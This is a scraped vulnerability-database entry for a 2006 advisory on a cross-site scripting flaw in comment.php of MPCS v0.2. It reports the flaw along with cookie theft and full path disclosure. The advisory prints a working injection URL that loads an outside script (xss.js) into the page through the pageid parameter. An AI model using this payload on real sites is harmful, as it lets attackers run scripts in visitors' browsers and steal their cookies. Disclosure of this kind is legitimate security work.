Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13251
HistoryJun 21, 2006 - 12:00 a.m.

MPCS v0.2 - XSS

2006-06-2100:00:00
vulners.com
6
JSON

MPCS v0.2

Homepage:
http://tpvgames.co.uk/mpcs

Affected files:
comment.php

XSS vuln with cookie & full path disclosure:

Direct html injection doesnt seem to work, however, if you navigate to the code below in your browser, and then post a comment on the same page, our XSS

example will occure.

http://www.example.com/comment.php?pageid=12 <script src=http://www.youfucktard.com/xss.js&gt;&lt;/script&gt;

Screenshots:
http://www.youfucktard.com/xsp/mcs1.jpg
http://www.youfucktard.com/xsp/mcs2.jpg

JSON